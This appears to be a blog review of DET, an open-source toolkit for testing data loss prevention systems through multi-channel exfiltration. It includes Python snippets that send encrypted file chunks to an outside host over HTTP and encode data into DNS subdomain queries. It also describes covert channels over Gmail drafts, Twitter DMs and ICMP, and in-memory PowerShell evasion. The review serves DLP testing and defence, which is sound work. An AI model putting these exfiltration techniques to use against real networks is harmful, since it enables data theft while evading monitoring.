DET: Testing Data Loss Prevention by Thinking Like an Attacker

Hook

Your company's DLP solution blocks file uploads to Dropbox, but can it detect data leaving through DNS queries, Twitter DMs, and ICMP packets simultaneously? Most can't.

Context

Data Loss Prevention (DLP) systems have become increasingly sophisticated, monitoring network traffic for sensitive information leaving corporate environments. They excel at detecting obvious exfiltration attempts: large file uploads to cloud storage, email attachments containing credit card numbers, or USB drive transfers. Yet security teams face a fundamental challenge when validating these systems—they think defensively, testing controls against known attack patterns rather than creative evasion techniques.

DET emerged from SensePost's offensive security practice to flip this paradigm. Rather than asking "what can our DLP detect," it forces the question "what happens when an attacker uses legitimate services like Gmail API calls, embeds data in DNS TXT records, or splits payloads across Twitter direct messages?" The toolkit provides a controlled laboratory for security teams to adopt an attacker's perspective, stress-testing their detection capabilities against multi-channel exfiltration scenarios that mirror real-world advanced persistent threats.

Technical Insight

System architecture — auto-generated

DET implements a client-server architecture where both components share a unified plugin system. The server initializes by loading plugins from a JSON configuration file, spawning listeners for each enabled channel. Meanwhile, the client chunks target files, encrypts payloads with AES-256, and simultaneously transmits across multiple protocols. This architecture enables scenarios where data exits through three or four channels at once, overwhelming single-vector detection systems.

The plugin interface standardizes how each exfiltration channel operates. Every plugin must implement methods for initialization, data transmission, and cleanup. Here's a simplified example showing how the HTTP plugin structures outbound requests:

class HTTPPlugin:
    def __init__(self, config):
        self.target = config['target']
        self.port = config['port']
        self.uri = config['uri']
    
    def send_chunk(self, chunk_data, metadata):
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
            'X-Request-ID': metadata['chunk_id']
        }
        encrypted_payload = aes_encrypt(chunk_data, self.key)
        compressed = zlib.compress(encrypted_payload)
        
        response = requests.post(
            f'http://{self.target}:{self.port}{self.uri}',
            data=compressed,
            headers=headers
        )
        return response.status_code == 200

The real innovation lies in how DET leverages legitimate services as exfiltration channels. The Gmail plugin, for instance, doesn't just send emails—it uses Gmail's API to create draft messages that never actually send, storing data in a semi-permanent location that looks like normal user behavior. Similarly, the Twitter plugin embeds Base64-encoded chunks in direct messages, a technique that blends with social media noise and bypasses perimeter controls entirely.

DNS exfiltration demonstrates particularly clever encoding. The toolkit splits file data into subdomain labels, constructing queries like [chunk_data].target.com. Since DNS queries are rarely scrutinized and typically allowed outbound, this creates a covert channel:

def dns_exfiltrate(chunk, target_domain, max_label_length=63):
    encoded = base64.b32encode(chunk).decode('utf-8').lower()
    labels = [encoded[i:i+max_label_length] 
              for i in range(0, len(encoded), max_label_length)]
    fqdn = '.'.join(labels + [target_domain])
    resolver.query(fqdn, 'A')

The multi-channel capability deserves emphasis. DET's configuration allows simultaneous operation of multiple plugins, meaning a 10MB file might simultaneously exit through DNS queries, ICMP echo request payloads, and Twitter DMs. Each channel receives different chunks, and the server reassembles them regardless of arrival order. This fragmentation defeats DLP systems that analyze individual channels in isolation—even if one channel gets blocked, others complete the exfiltration.

For Windows environments without Python, DET includes PowerShell module variants. These aren't mere ports but reimplementations that leverage Windows-native capabilities like Invoke-WebRequest and .NET cryptography libraries. The PowerShell version can operate entirely in memory, never touching disk, which evades file-based detection mechanisms common in endpoint security tools.

Gotcha

DET ships with prominent warnings about its proof-of-concept status, and those warnings prove prescient. The repository hasn't seen significant updates since 2016, leaving several experimental plugins incomplete. The Skype and Tor modules exist in skeleton form but lack functional implementations. More problematically, the Github exfiltration plugin—which would create commits containing data chunks—never materialized despite roadmap mentions.

The toolkit's age shows in its detection evasion capabilities. Modern DLP and EDR solutions have evolved considerably since 2016, implementing behavioral analysis and machine learning models that identify anomalous patterns regardless of protocol. DET's traffic patterns, while diverse, follow predictable structures that contemporary detection systems can fingerprint. The roadmap mentioned integrating Cloakify for better obfuscation, but this never happened. Additionally, the primary repository has apparently moved to a different maintainer (PaulSec), suggesting this SensePost fork may represent abandoned code. Before using DET in any security assessment, verify whether newer forks address these gaps.

Verdict

Use if you're a security team building a DLP testing laboratory with controlled, non-sensitive data. DET excels at demonstrating how multi-channel exfiltration defeats single-vector detection, making it valuable for vendor evaluations or red team training scenarios. Its protocol diversity—especially the legitimate service channels—illustrates real attacker techniques worth defending against. Skip if you need production-ready tooling, actively maintained software, or plan to use it with actual sensitive data (both ethically wrong and legally questionable). Also skip if your assessment requires modern obfuscation techniques or complete feature implementations—the 2016 vintage and incomplete experimental modules mean you're better served by alternatives like PyExfil or building custom tools. Check the PaulSec fork for potentially more current development.

DET: Testing Data Loss Prevention by Thinking Like an Attacker

DET: Testing Data Loss Prevention by Thinking Like an Attacker

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// CODEBASE INTELLIGENCE

Best for

Skip when

[ SIMILAR REPOS ]

DET: Testing Data Loss Prevention by Thinking Like an Attacker

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// RELATED

Open Interpreter: Running GPT-4 with Root Access to Your Machine

Accomplish: Why Wrapping OpenCode Instead of Building an Agent Runtime Was the Right Bet

NVIDIA Cosmos: A Case Study in Strategic Repository Deprecation

How Ripgrep Makes Searching 10x Faster Than Grep: A Deep Dive Into Rust-Powered Text Search

Open Interpreter: Running GPT-4 with Root Access to Your Machine

Accomplish: Why Wrapping OpenCode Instead of Building an Agent Runtime Was the Right Bet

NVIDIA Cosmos: A Case Study in Strategic Repository Deprecation

// CODEBASE INTELLIGENCE

Best for

Skip when

[ SIMILAR REPOS ]